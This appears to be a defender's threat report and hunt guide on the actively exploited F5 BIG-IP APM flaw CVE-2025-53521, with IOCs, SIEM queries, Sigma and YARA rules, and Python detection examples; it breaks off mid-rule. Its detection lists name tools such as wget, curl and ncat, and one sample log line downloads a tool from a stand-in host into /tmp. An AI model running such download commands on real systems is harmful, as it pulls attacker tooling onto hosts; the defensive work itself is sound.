F5 BIG-IP APM Under Active Exploitation: Urgent Patch Required
CISA added CVE-2025-53521 to its Known Exploited Vulnerabilities catalog on March 27, 2026, giving Federal Civilian Executive Branch agencies until Monday, March 30 to apply fixes [1][2]. The urgency is warranted: the vulnerability was originally classified as a denial-of-service issue in October 2025, but F5 reclassified it as unauthenticated remote code execution in March 2026 after obtaining new information about active exploitation [1].
The flaw carries a CVSS v3.1 score of 9.8 and a CVSS v4.0 score of 9.3 [1]. Security researchers reported acute scanning activity targeting vulnerable F5 BIG-IP devices following the KEV addition [2]. Organizations running BIG-IP Access Policy Manager need to treat this as a priority-one action item.
Background: What CVE-2025-53521 Actually Does
CVE-2025-53521 affects F5 BIG-IP Access Policy Manager (APM) versions 17.5.0 through 17.5.1, 17.1.0 through 17.1.2, 16.1.0 through 16.1.6, and 15.1.0 through 15.1.10 [1]. When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to remote code execution [1].
The reclassification timeline matters. For roughly five months, between October 2025 and March 2026, organizations that triaged this as a DoS-only issue may have deprioritized patching. F5's advisory does not say when the exploitation began, only that it was discovered in March 2026 [1]. As one researcher stated: "What we're observing now is pre-auth remote code execution and evidence of in-the-wild exploitation" [2].
BIG-IP APM is commonly deployed as the front door for remote access and VPN services. A pre-auth RCE on these appliances gives an attacker root-level access to a device that sits directly in the authentication path for sensitive internal resources.
Technical Detail: How CVE-2025-53521 Works
When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to remote code execution [1][2]. The vulnerability requires no credentials and no prior access. The attacker only needs network reachability to a virtual server with an APM access policy attached.
F5 has detected the threat actor making modifications that would affect the functioning of sys-eicheck, the BIG-IP system integrity checker [1]. The company also released mitigation.sh, a script to apply interim protections on systems that can't be patched immediately [1].
The pre-authentication nature targeting the data plane (virtual servers) rather than the management interface is the critical differentiator. This means the attack surface includes any BIG-IP APM virtual server reachable from untrusted networks.
UNC5174: Chinese State-Sponsored Exploitation of F5 Infrastructure
Active exploitation of F5 BIG-IP isn't new, and the threat actor profile is worth understanding for defenders prioritizing their response. Mandiant observed UNC5174 exploiting CVE-2023-46747, which allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user [3]. Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands [3].
UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation [3]. The vulnerability involves Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands [3]. Notably, UNC5174 attempted to self-patch the vulnerability using an F5-provided mitigation script, assessed as an attempt to limit subsequent exploitation by additional unrelated threat actors [3].
F5 Source Code Theft and Zero-Day Risk
A separate but related concern: CISA issued Emergency Directive 26-01 after a nation-state affiliated cyber threat actor compromised F5's systems and exfiltrated files, which included a portion of its BIG-IP source code and vulnerability information [4]. The threat actor's access to F5's proprietary source code could provide a technical advantage to exploit F5 devices through static and dynamic analysis for identification of logical flaws and zero-day vulnerabilities [4].
This means defenders should expect a continued pipeline of F5 vulnerabilities being discovered and weaponized by state-sponsored actors. The directive required agencies to inventory all F5 BIG-IP products and update instances by October 22, 2025 [4]. Resecurity linked this source code theft to campaigns deploying the BRICKSTORM backdoor, a Go-based ELF backdoor [6].
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| IP | 61.239.68.73 | Hong Kong IP associated with UNC5174 exploitation of CVE-2023-46747 | [3] |
| Malware | SNOWLIGHT | C-based ELF downloader used by UNC5174 | [3] |
| Malware | GOREVERSE | GoLang reverse shell backdoor | [3] |
| Malware | GOHEAVY | GoLang tunneling tool for lateral movement | [3] |
| Malware | SUPERSHELL | C2 framework used by UNC5174 | [3] |
| Malware | BRICKSTORM | Go ELF backdoor with components Pg_update and Listener | [6] |
| Filename | mitigation.sh | F5-provided mitigation script | [1] |
| Filename | /tmp/ss | Reconnaissance tool downloaded to compromised systems | [3] |
| Filename | Pg_update | BRICKSTORM backdoor system/update helper | [6] |
| Filename | Listener | BRICKSTORM component for C2/socket handling | [6] |
| Filename | sys-eicheck | BIG-IP system integrity checker targeted for modification | [4] |
| URL | /mgmt/tm/util/bash | API endpoint for command execution when auth is bypassed | [5] |
| URL | /tmui | Handler code path for CVE-2023-46747 exploitation | [5] |
MITRE ATT&CK Mapping
| Technique ID | Name | Relevance |
|---|---|---|
| T1190 | Exploit Public-Facing Application | Direct exploitation of BIG-IP APM virtual servers and TMUI [1][3][5] |
| T1059 | Command and Scripting Interpreter | Bash command execution via compromised BIG-IP systems [3][5] |
| T1071 | Application Layer Protocol | BRICKSTORM uses encrypted WebSocket connections for C2 [6] |
| T1105 | Ingress Tool Transfer | Download of reconnaissance tools to /tmp/ss and deployment of malware [3] |
| T1562 | Impair Defenses | UNC5174 self-patching vulnerabilities to lock out other actors; modification of sys-eicheck integrity checker [3][4] |
| T1027 | Obfuscated Files or Information | Fileless payload delivery methods observed in campaigns |
Detection and Hunting
Network-level indicators:
- Monitor for scanning activity against BIG-IP APM virtual servers, particularly from unfamiliar external sources. Researchers confirmed acute scanning activity following the KEV addition [2].
- Alert on connections to or from `61.239.68.73` [3].
- Inspect traffic to BIG-IP APM virtual servers for anomalous payloads that don't match expected authentication workflows.
Host-level indicators on BIG-IP appliances:
- Look for unexpected files in `/tmp/`, specifically `/tmp/ss` [3].
- Audit for modifications to sys-eicheck, the BIG-IP system integrity checker [4].
- Search for unexpected binaries named `Pg_update`, `Listener`, or `Vmprotect` in system paths and `/etc/sysconfig/` [6].
- Review recently created administrative accounts on BIG-IP systems, a known UNC5174 TTP following exploitation [3].
SIEM/Log queries:
- `index=network dest_ip=61.239.68.73` for C2 traffic detection.
- `index=web uri_path="/mgmt/tm/util/bash" method=POST` for CVE-2023-46747 exploitation attempts against management interfaces [5].
- Monitor BIG-IP audit logs for new user creation events and privilege escalation, particularly from non-standard source IPs.
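The indicators above, applied in code to a handful of constructed log lines. This is an added example and not part of the original report: the four log line formats (`FW`, `FILE`, `HTTP`, `AUDIT`), the management subnet `10.0.0.0/24`, the set of "system paths" and every sample value other than the IOCs themselves are assumptions made for the example; real BIG-IP syslog, auditd and firewall formats differ, so the regexes are the part to adapt.

```python
"""Added example (not part of the original report): runs the network-level and
host-level hunting indicators over constructed log lines."""
from __future__ import annotations

import ipaddress
import re
from collections import Counter
from dataclasses import dataclass

# Indicators taken from the report's IOC table and hunting notes.
KNOWN_BAD_IPS = {"61.239.68.73"}                            # [3]
SUSPICIOUS_TMP_FILES = {"/tmp/ss"}                          # [3]
INTEGRITY_CHECKER = "sys-eicheck"                           # [1][4]
BRICKSTORM_NAMES = {"Pg_update", "Listener", "Vmprotect"}   # [6]
CMD_EXEC_ENDPOINT = "/mgmt/tm/util/bash"                    # [5]
# "System paths" is not enumerated in the report; this set is an assumption.
SYSTEM_DIRS = ("/etc/sysconfig/", "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")
# Assumed out-of-band management subnet; admin creation from anywhere else gets its own rule name.
MGMT_NETWORK = ipaddress.ip_network("10.0.0.0/24")


@dataclass(frozen=True)
class Finding:
    rule: str
    line: str


# Constructed line formats (invented for this example, not real BIG-IP formats):
#   FW src=<ip> dst=<ip> dport=<port> action=<allow|deny>
#   FILE op=<create|write|modify|read> path=<path> user=<user>
#   HTTP src=<ip> method=<verb> uri=<path> status=<code>
#   AUDIT user=<actor> action=<create|modify> object=user name=<name> role=<role> src=<ip>
FW_RE = re.compile(r"^FW src=(?P<src>\S+) dst=(?P<dst>\S+) dport=\d+ action=\S+$")
FILE_RE = re.compile(r"^FILE op=(?P<op>\S+) path=(?P<path>\S+) user=\S+$")
HTTP_RE = re.compile(r"^HTTP src=\S+ method=(?P<method>\S+) uri=(?P<uri>\S+) status=\d+$")
AUDIT_RE = re.compile(
    r"^AUDIT user=\S+ action=(?P<action>\S+) object=user name=(?P<name>\S+) "
    r"role=(?P<role>\S+) src=(?P<src>\S+)$"
)


def _split_path(path: str) -> tuple[str, str]:
    """Return (directory with trailing slash, basename)."""
    directory, _, name = path.rpartition("/")
    return directory + "/", name


def check_line(line: str) -> list[Finding]:
    """Apply every applicable indicator to one log line."""
    findings: list[Finding] = []
    if m := FW_RE.match(line):
        if m["src"] in KNOWN_BAD_IPS or m["dst"] in KNOWN_BAD_IPS:
            findings.append(Finding("c2_ip_contact", line))
    elif m := FILE_RE.match(line):
        directory, name = _split_path(m["path"])
        if m["path"] in SUSPICIOUS_TMP_FILES and m["op"] in {"create", "write"}:
            findings.append(Finding("tmp_ss_dropped", line))
        if name == INTEGRITY_CHECKER and m["op"] in {"write", "modify"}:
            findings.append(Finding("integrity_checker_modified", line))
        if name in BRICKSTORM_NAMES and directory in SYSTEM_DIRS:
            findings.append(Finding("brickstorm_binary", line))
    elif m := HTTP_RE.match(line):
        if m["method"] == "POST" and m["uri"] == CMD_EXEC_ENDPOINT:
            findings.append(Finding("mgmt_bash_post", line))
    elif m := AUDIT_RE.match(line):
        if m["action"] == "create" and m["role"] == "admin":
            external = ipaddress.ip_address(m["src"]) not in MGMT_NETWORK
            findings.append(Finding("admin_created_external" if external else "admin_created", line))
    return findings


def hunt(lines: list[str]) -> tuple[list[Finding], dict[str, int]]:
    """Run check_line over a whole log; return all findings plus per-rule counts."""
    findings = [f for line in lines for f in check_line(line)]
    return findings, dict(Counter(f.rule for f in findings))


# Constructed sample log. Apart from the IOC, addresses are RFC 1918 / RFC 5737 ranges,
# and the sys-eicheck path is a placeholder, not its real location.
SAMPLE_LOG = [
    "FW src=10.0.0.5 dst=61.239.68.73 dport=443 action=allow",
    "FW src=10.0.0.5 dst=198.51.100.7 dport=443 action=allow",
    "FILE op=create path=/tmp/ss user=root",
    "FILE op=create path=/tmp/session.log user=apache",
    "FILE op=write path=/usr/bin/sys-eicheck user=root",
    "FILE op=create path=/etc/sysconfig/Pg_update user=root",
    "HTTP src=203.0.113.9 method=POST uri=/mgmt/tm/util/bash status=200",
    "HTTP src=10.0.0.20 method=GET uri=/tmui/login.jsp status=200",
    "AUDIT user=admin action=create object=user name=svc_backup role=admin src=203.0.113.9",
    "AUDIT user=admin action=modify object=user name=jdoe role=guest src=10.0.0.20",
]

if __name__ == "__main__":
    found, counts = hunt(SAMPLE_LOG)
    for f in found:
        print(f"{f.rule:28} {f.line}")
    print(counts)
```

Six of the ten constructed lines fire, one per rule; the benign lines (a normal outbound connection, an application log in `/tmp/`, a TMUI login page load, a role downgrade of an existing user) are left alone. Matching sys-eicheck by basename rather than by full path is deliberate, since the report does not give its location.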
Sector Impact Assessment
Defense and Intelligence: BIG-IP APM is widely used to broker VPN and remote access to sensitive environments. UNC5174's documented interest in selling access to U.S. defense contractor appliances [3] makes this a direct threat to the defense industrial base. The theft of F5 source code by a nation-state actor [4] compounds the risk by enabling targeted zero-day development against these specific deployments.
Healthcare: Hospitals and health systems use BIG-IP APM for clinician remote access, patient portal authentication, and inter-facility connectivity. A compromised APM appliance provides access to sensitive healthcare data. Healthcare organizations subject to HIPAA should treat an unpatched BIG-IP APM as a reportable risk.
Financial Services and Government: Both sectors deploy BIG-IP extensively for application delivery and load balancing. Federal agencies are already under CISA's emergency directive timeline [4]. Financial institutions should apply equivalent urgency given the pre-auth nature of CVE-2025-53521.
Other Recent F5 Vulnerabilities Worth Tracking
CVE-2025-53521 is the most urgent current threat, but it exists in a broader pattern of serious F5 vulnerabilities. CVE-2023-46747, the authentication bypass via request smuggling in BIG-IP TMUI, allows unauthenticated remote attackers to execute arbitrary commands as root and was exploited by UNC5174 starting in October 2023 [3][5]. CISA's Emergency Directive 26-01, issued in response to F5 source code theft, signals an expectation that additional zero-days targeting BIG-IP are likely in development [4].
Red Sheep Assessment
Confidence: High
The convergence of three factors creates a compounding risk for F5 BIG-IP customers that goes beyond any single CVE. First, CVE-2025-53521 provides unauthenticated access through the data plane, not the management interface. This dramatically expands the attack surface compared to previous F5 vulnerabilities. Second, a nation-state actor possesses F5's proprietary source code [4], which likely accelerated the discovery of this vulnerability and will accelerate discovery of future ones. Third, Chinese state-sponsored actors have an established operational playbook for F5 exploitation, complete with tooling (SNOWLIGHT, BRICKSTORM) and a commercial motivation to broker access [3].
The five-month gap between the initial DoS classification and the RCE reclassification of CVE-2025-53521 is a significant detail. Organizations that used automated vulnerability management tools likely deprioritized this CVE during that period based on its original severity rating. Threat actors may have been exploiting it as an RCE well before F5's March 2026 reclassification. The compressed CISA deadline suggests the government has intelligence about exploitation scope that hasn't been made public.
Defenders should plan for a sustained campaign of F5 zero-days. The source code theft provides a structural advantage to the threat actor that won't diminish with any single patch cycle.
Defender's Checklist
- [ ] Inventory all F5 BIG-IP APM instances and verify whether access policies are configured on virtual servers. Patch CVE-2025-53521 immediately or apply `mitigation.sh` as an interim measure [1].
- [ ] Hunt for indicators on all BIG-IP APM systems. Run `find / -name "ss" -path "/tmp/*"` and review F5's iHealth diagnostic tool output [1].
- [ ] Block inbound and outbound traffic to `61.239.68.73` at the perimeter and monitor DNS/proxy logs for connections to this address [3].
- [ ] Audit BIG-IP administrative accounts for unauthorized additions. Query `tmsh list auth user` and compare against a known-good baseline, focusing on accounts created since October 2025 [3].
- [ ] Verify that BIG-IP management interfaces (`/tmui`, `/mgmt/tm/`) are not accessible from untrusted networks. Restrict management access to a dedicated out-of-band management VLAN with MFA-enforced jump hosts [5].
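The account-audit item above, carried out in code: parse the output of `tmsh list auth user` and diff it against a known-good baseline. This is an added example, not the report's own tooling; the sample output is constructed to resemble tmsh's brace-delimited format, and the baseline, the user names and the `parse_tmsh_users` / `diff_against_baseline` helpers are assumptions made for the example, not captured device data.

```python
"""Added example (not part of the original report): diff `tmsh list auth user`
output against a known-good baseline of BIG-IP accounts."""
from __future__ import annotations

import re

# One top-level block per user, "auth user NAME { ... }". Nested blocks are indented,
# so the first "}" at column 0 after the header closes the user block.
USER_BLOCK_RE = re.compile(r"^auth user (?P<name>\S+) \{(?P<body>.*?)^\}", re.S | re.M)
ROLE_RE = re.compile(r"\brole (\S+)")
SHELL_RE = re.compile(r"\bshell (\S+)")


def parse_tmsh_users(text: str) -> dict[str, dict[str, str]]:
    """Return {name: {"role": ..., "shell": ...}} from tmsh-style output."""
    users: dict[str, dict[str, str]] = {}
    for m in USER_BLOCK_RE.finditer(text):
        body = m["body"]
        role = ROLE_RE.search(body)
        shell = SHELL_RE.search(body)
        users[m["name"]] = {
            "role": role.group(1) if role else "unknown",
            "shell": shell.group(1) if shell else "none",
        }
    return users


def diff_against_baseline(current: dict[str, dict[str, str]],
                          baseline: dict[str, dict[str, str]]) -> dict:
    """Accounts added, removed, re-roled, or given shell access since the baseline."""
    return {
        "new_accounts": sorted(n for n in current if n not in baseline),
        "removed_accounts": sorted(n for n in baseline if n not in current),
        "role_changes": {
            n: (baseline[n]["role"], current[n]["role"])
            for n in sorted(current)
            if n in baseline and current[n]["role"] != baseline[n]["role"]
        },
        # Any interactive shell on an appliance account is worth a look on its own.
        "shell_access": sorted(n for n, u in current.items() if u["shell"] != "none"),
    }


# Constructed sample output (layout modelled on tmsh; not captured from a device).
TMSH_OUTPUT = """\
auth user admin {
    description "Admin User"
    partition-access {
        all-partitions {
            role admin
        }
    }
    shell none
}
auth user jdoe {
    description "J. Doe"
    partition-access {
        all-partitions {
            role admin
        }
    }
    shell none
}
auth user svc_backup {
    partition-access {
        all-partitions {
            role admin
        }
    }
    shell bash
}
"""

# Assumed known-good baseline recorded before October 2025.
BASELINE = {
    "admin": {"role": "admin", "shell": "none"},
    "jdoe": {"role": "guest", "shell": "none"},
}

if __name__ == "__main__":
    users = parse_tmsh_users(TMSH_OUTPUT)
    for key, value in diff_against_baseline(users, BASELINE).items():
        print(f"{key}: {value}")
```

`tmsh list auth user` carries no creation timestamp, so the "created since October 2025" part of the checklist cannot come from this output alone: the diff tells you which names to look up in the BIG-IP audit log, where user-creation events and their source addresses are recorded.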
References
- Help Net Security, "Attackers are exploiting RCE vulnerability in BIG-IP APM systems (CVE-2025-53521)," March 28, 2026. https://www.helpnetsecurity.com/2026/03/28/big-ip-apm-vulnerability-cve-2025-53521-exploited/
- The Hacker News, "CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation," March 28, 2026. https://thehackernews.com/2026/03/cisa-adds-cve-2025-53521-to-kev-after.html
- Google Cloud / Mandiant, "Bringing Access Back: Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect." https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect
- CISA, "ED 26-01: Mitigate Vulnerabilities in F5 Devices." https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices
- Praetorian, "Refresh: Compromising F5 BIG-IP With Request Smuggling | CVE-2023-46747." https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
- Resecurity, "F5 BIG-IP Source Code Leak Tied to BRICKSTORM Backdoor." https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor
- News4Hackers, "CVE-2025-53521 F5 BIG-IP APM Exploitation." https://www.news4hackers.com/big-ip-apm-remote-code-execution-vulnerability-exploited-by-attackers-cve-2025-53521
---
Hunt Guide: Hunt Report: CVE-2025-53521 F5 BIG-IP APM Remote Code Execution
Hypothesis: If threat actors are exploiting CVE-2025-53521 or related F5 vulnerabilities in our environment, we expect to observe unauthorized administrative account creation, suspicious files in /tmp/, modifications to sys-eicheck, and C2 communications to known malicious infrastructure in F5 BIG-IP logs, network traffic, and host artifacts.
Intelligence Summary: CVE-2025-53521 is a critical unauthenticated remote code execution vulnerability in F5 BIG-IP APM (CVSS 9.8) being actively exploited in the wild. The vulnerability was reclassified from DoS to RCE in March 2026 after F5 discovered active exploitation, with CISA adding it to KEV and mandating federal agencies patch by March 30, 2026. Chinese state-sponsored actor UNC5174 has previously exploited similar F5 vulnerabilities and possesses stolen F5 source code.
Confidence: High | Priority: Critical
Scope
- Networks: All F5 BIG-IP APM appliances (versions 17.5.0-17.5.1, 17.1.0-17.1.2, 16.1.0-16.1.6, 15.1.0-15.1.10), particularly those with virtual servers exposed to untrusted networks
- Timeframe: October 2025 to present (CVE was initially misclassified as DoS, actual RCE exploitation may have begun earlier)
- Priority Systems: Internet-facing F5 BIG-IP APM devices, VPN concentrators, authentication gateways for healthcare/defense networks, any F5 device with access to sensitive internal resources
MITRE ATT&CK Techniques
T1190 — Exploit Public-Facing Application (Initial Access) [P1]
Exploitation of CVE-2025-53521 in F5 BIG-IP APM virtual servers for unauthenticated remote code execution
Splunk SPL:
index=f5_bigip OR index=network sourcetype=f5:bigip:asm:syslog OR sourcetype=f5:bigip:ltm:log | eval suspicious_uri=if(match(uri, "(?i)(eval|exec|system|shell|cmd|bash|powershell)"), 1, 0) | where suspicious_uri=1 OR http_status>=500 | stats count by src_ip, dest_ip, uri, http_status, _time | where count>10
Elastic KQL:
(source:"f5-bigip" OR tags:"f5") AND (http.response.status_code:>=500 OR url.path:(*eval* OR *exec* OR *system* OR *shell* OR *cmd* OR *bash*))
Sigma Rule:
```yaml
title: F5 BIG-IP APM Exploitation Attempt
id: a7c4f8e2-3b91-4d5a-9c17-8e4f5d3a2b1c
status: experimental
description: Detects potential exploitation attempts against F5 BIG-IP APM
references:
  - https://www.helpnetsecurity.com/2026/03/28/big-ip-apm-vulnerability-cve-2025-53521-exploited/
author: PEAK Hunt Team
date: 2026/03/28
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2025.53521
logsource:
  product: f5
  service: bigip
detection:
  selection_status:
    http_status:
      - 500
      - 502
      - 503
  selection_suspicious_uri:
    uri|contains:
      - 'eval'
      - 'exec'
      - 'system'
      - 'bash'
      - 'cmd'
  condition: selection_status or selection_suspicious_uri
falsepositives:
  - Legitimate administrative activity
  - Application errors
level: high
```
Monitor for HTTP 500 errors and suspicious URI patterns indicating command injection. Baseline normal APM traffic patterns to reduce false positives.
T1059 — Command and Scripting Interpreter (Execution) [P1]
Execution of bash commands via compromised F5 BIG-IP systems, particularly through /mgmt/tm/util/bash endpoint
Splunk SPL:
index=f5_bigip sourcetype=f5:bigip:audit OR sourcetype=f5:bigip:asm:syslog | search (uri="/mgmt/tm/util/bash" AND method="POST") OR (command="*bash*" OR command="*sh -c*" OR command="*/tmp/*") | table _time src_ip user command uri method | dedup src_ip
Elastic KQL:
(source:"f5-bigip-audit" OR tags:"f5-audit") AND (url.path:"/mgmt/tm/util/bash" OR process.command_line:(*bash* OR *sh -c* OR */tmp/*))
Sigma Rule:
```yaml
title: F5 BIG-IP Suspicious Command Execution
id: b8d4f7e3-4c92-5e6b-0d28-9e5f6e4b3c2d
status: experimental
description: Detects suspicious command execution on F5 BIG-IP systems
references:
  - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
author: PEAK Hunt Team
date: 2026/03/28
tags:
  - attack.execution
  - attack.t1059
logsource:
  product: f5
  service: audit
detection:
  selection_bash_endpoint:
    uri: '/mgmt/tm/util/bash'
    method: 'POST'
  selection_suspicious_commands:
    command|contains:
      - 'wget'
      - 'curl'
      - 'nc '
      - 'ncat'
      - '/tmp/'
      - 'base64'
      - 'python'
  condition: selection_bash_endpoint or selection_suspicious_commands
falsepositives:
  - Legitimate administrative scripts
level: high
```
Focus on commands executed through management API endpoints and any processes spawned from web service contexts.
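To make the matching semantics of the Sigma rule above concrete, here is a minimal evaluator for its `detection` block run over constructed audit events. It is an added example, not part of the hunt guide: the rule is transcribed into the `T1059_DETECTION` dict, the event field names (`uri`, `method`, `command`) and sample values are assumptions, and the evaluator covers only exact-match fields, the `|contains` / `|startswith` / `|endswith` modifiers, list values (any-of) and conditions built from selection names joined with `and` / `or`; it is not a full Sigma implementation.

```python
"""Added example (not part of the original hunt guide): a minimal evaluator for the
T1059 Sigma rule's detection block, run over constructed BIG-IP audit events."""
from __future__ import annotations

# The rule's detection block, transcribed as a dict.
T1059_DETECTION = {
    "selection_bash_endpoint": {"uri": "/mgmt/tm/util/bash", "method": "POST"},
    "selection_suspicious_commands": {
        "command|contains": ["wget", "curl", "nc ", "ncat", "/tmp/", "base64", "python"],
    },
    "condition": "selection_bash_endpoint or selection_suspicious_commands",
}


def _field_matches(spec: str, expected, event: dict) -> bool:
    """Match one field spec such as 'command|contains'; a list of values is any-of."""
    field, _, modifier = spec.partition("|")
    if field not in event:
        return False
    actual = str(event[field])
    candidates = expected if isinstance(expected, list) else [expected]
    for cand in map(str, candidates):
        if modifier == "contains" and cand in actual:
            return True
        if modifier == "startswith" and actual.startswith(cand):
            return True
        if modifier == "endswith" and actual.endswith(cand):
            return True
        if modifier == "" and cand == actual:
            return True
    return False


def selection_matches(selection: dict, event: dict) -> bool:
    """Every field listed inside one selection must match (Sigma AND semantics)."""
    return all(_field_matches(spec, exp, event) for spec, exp in selection.items())


def evaluate(detection: dict, event: dict) -> tuple[bool, list[str]]:
    """Return (rule fired, names of selections that matched).
    Condition grammar supported: selection names joined by 'and'/'or', with 'and'
    binding tighter; no parentheses, 'not' or aggregation."""
    matched = [
        name for name, sel in detection.items()
        if name != "condition" and selection_matches(sel, event)
    ]
    for conjunction in detection["condition"].split(" or "):
        if all(name.strip() in matched for name in conjunction.split(" and ")):
            return True, matched
    return False, matched


# Constructed events (field names assumed; 203.0.113.9 is an RFC 5737 documentation address).
SAMPLE_EVENTS = [
    {"uri": "/mgmt/tm/util/bash", "method": "POST", "user": "admin", "command": "id"},
    {"uri": "/mgmt/tm/ltm/virtual", "method": "POST", "user": "admin"},
    {"command": "wget -O /tmp/ss http://203.0.113.9/ss"},
    {"command": "python /config/backup.py"},      # benign admin script, still fires
    {"command": "tmsh list ltm virtual"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        fired, which = evaluate(T1059_DETECTION, event)
        print(f"{'ALERT' if fired else 'ok   '} {which} {event}")
```

The fourth event is the false positive the rule itself lists (a legitimate administrative script containing `python`), which is why the guide's note above says to focus on commands arriving through management API endpoints or spawned from web-service contexts rather than on the keyword list alone.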
T1562.001 — Disable or Modify Tools (Defense Evasion) [P1]
Modification of sys-eicheck integrity checker and self-patching of vulnerabilities to prevent other actors
Splunk SPL:
index=f5_bigip sourcetype=f5:bigip:system OR sourcetype=linux_secure | search (file="*sys-eicheck*" OR process="*eicheck*" OR file="*mitigation.sh*") AND (action="modify" OR action="write" OR command="*chmod*" OR command="*chattr*") | stats count by file, process, user, src_ip | where user!="root" OR src_ip!="127.0.0.1"
Elastic KQL:
(source:"f5-bigip" OR system.auth.program:"sys-eicheck") AND (file.path:*sys-eicheck* OR process.name:*eicheck* OR file.name:"mitigation.sh") AND (event.action:("modify" OR "write" OR "chmod" OR "chattr"))
Alert on any modifications to sys-eicheck or unexpected execution of mitigation scripts from non-standard locations
T1136.001 — Create Account: Local Account (Persistence) [P1]
Creation of unauthorized administrative accounts on compromised F5 BIG-IP systems
Splunk SPL:
index=f5_bigip sourcetype=f5:bigip:audit | search (command="create" OR command="modify") AND (object_type="user" OR path="/auth/user/*") | regex user!="(admin|root|f5admin)" | table _time, src_ip, user, created_user, role | sort - _time
Elastic KQL:
(source:"f5-bigip-audit") AND (event.action:("create" OR "user-create" OR "user-add")) AND (object.type:"user" OR url.path:"/auth/user/*")
Baseline authorized admin accounts and alert on any new privileged user creation, especially from external IPs
T1071.001 — Application Layer Protocol: Web Protocols (Command and Control) [P2]
BRICKSTORM backdoor uses encrypted WebSocket connections for C2 communications
Splunk SPL:
index=network OR index=proxy | search (dest_ip="61.239.68.73" OR src_ip="61.239.68.73") OR (protocol="websocket" OR uri="*ws://*" OR uri="*wss://*") | stats count by src_ip, dest_ip, dest_port, protocol | where count>50
Elastic KQL:
(destination.ip:"61.239.68.73" OR source.ip:"61.239.68.73") OR (network.protocol:"websocket" OR url.scheme:("ws" OR "wss"))
Monitor for persistent WebSocket connections to unusual external IPs, especially from F5 appliances
T1105 — Ingress Tool Transfer (Command and Control) [P2]
Download of reconnaissance tools and malware to compromised systems, particularly to /tmp/ directory
Splunk SPL:
index=f5_bigip OR index=linux_secure | search (file="/tmp/*" AND (action="create" OR action="write")) OR (command="*wget*" OR command="*curl*" OR command="*scp*") | regex file!="\.(log|tmp|pid)$" | table _time, host, file, size, user, process | where size>1000
Elastic KQL:
(file.path:"/tmp/*" AND event.action:("creation" OR "write")) OR (process.command_line:(*wget* OR *curl* OR *scp*) AND NOT file.extension:("log" OR "tmp" OR "pid"))
Focus on executable files or scripts created in /tmp/, especially named 'ss' or containing Go/ELF binaries
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| ip | 61.239.68.73 | Hong Kong IP associated with UNC5174 exploitation of CVE-2023-46747 |
| filename | /tmp/ss | Reconnaissance tool downloaded to compromised F5 BIG-IP systems by UNC5174 |
| filename | mitigation.sh | F5-provided mitigation script, but also used by UNC5174 to self-patch vulnerabilities |
| filename | sys-eicheck | BIG-IP system integrity checker targeted for modification by threat actors |
| filename | Pg_update | BRICKSTORM backdoor component used as system/update helper |
| filename | Listener | BRICKSTORM backdoor component for C2/socket handling |
| url | /mgmt/tm/util/bash | API endpoint for command execution when authentication is bypassed |
| url | /tmui | Handler code path for CVE-2023-46747 exploitation |
IOC Sweep Queries (Splunk):
index=* (dest_ip="61.239.68.73" OR src_ip="61.239.68.73" OR query="61.239.68.73") | stats count by index, sourcetype, src_ip, dest_ip, dest_port | sort - count
index=* (file="/tmp/ss" OR filename="ss" OR process="/tmp/ss" OR command="*/tmp/ss*") | stats count by host, file, process, user | sort - count
index=* (file="*mitigation.sh" OR process="*mitigation.sh" OR command="*mitigation.sh*") | stats count by host, file, user, src_ip | sort - count
index=* (file="*sys-eicheck*" OR process="*sys-eicheck*" OR command="*eicheck*") | search action!="read" | stats count by host, file, action, user | sort - count
index=* (file="*Pg_update*" OR process="*Pg_update*" OR filename="Pg_update") | stats count by host, file, path, hash | sort - count
index=* (file="*Listener" OR process="*Listener" OR filename="Listener") | search file!="*.dll" AND file!="*.exe" | stats count by host, file, path, hash | sort - count
index=* (uri="/mgmt/tm/util/bash" OR url="*/mgmt/tm/util/bash" OR cs_uri_stem="/mgmt/tm/util/bash") | search method="POST" | stats count by src_ip, dest_ip, status, user_agent | sort - count
index=* (uri="/tmui*" OR url="*/tmui*" OR cs_uri_stem="/tmui*") | search status>=400 OR bytes_out>10000 | stats count by src_ip, uri, status, bytes_out | sort - count
YARA Rules
BRICKSTORM_Backdoor — Detects BRICKSTORM Go-based ELF backdoor components
```yara
rule BRICKSTORM_Backdoor {
    meta:
        description = "Detects BRICKSTORM backdoor components used in F5 BIG-IP exploitation"
        author = "PEAK Hunt Team"
        date = "2026-03-28"
        reference = "https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor"
        hash1 = "unknown"
    strings:
        $s1 = "Pg_update" fullword ascii
        $s2 = "Listener" fullword ascii
        $s3 = "Vmprotect" fullword ascii
        $s4 = "/etc/sysconfig/" ascii
        $go1 = "Go build ID:" ascii
        $go2 = "runtime.gopanic" ascii
        $elf = { 7F 45 4C 46 }
        $websocket1 = "websocket" ascii
        $websocket2 = "ws://" ascii
        $websocket3 = "wss://" ascii
    condition:
        $elf at 0 and
        (
            2 of ($s*) or
            (1 of ($s*) and 2 of ($go*) and 1 of ($websocket*))
        )
}
```
F5_BIGIP_Exploitation_Artifacts — Detects artifacts of F5 BIG-IP exploitation including UNC5174 tools
```yara
rule F5_BIGIP_Exploitation_Artifacts {
    meta:
        description = "Detects artifacts from F5 BIG-IP exploitation campaigns"
        author = "PEAK Hunt Team"
        date = "2026-03-28"
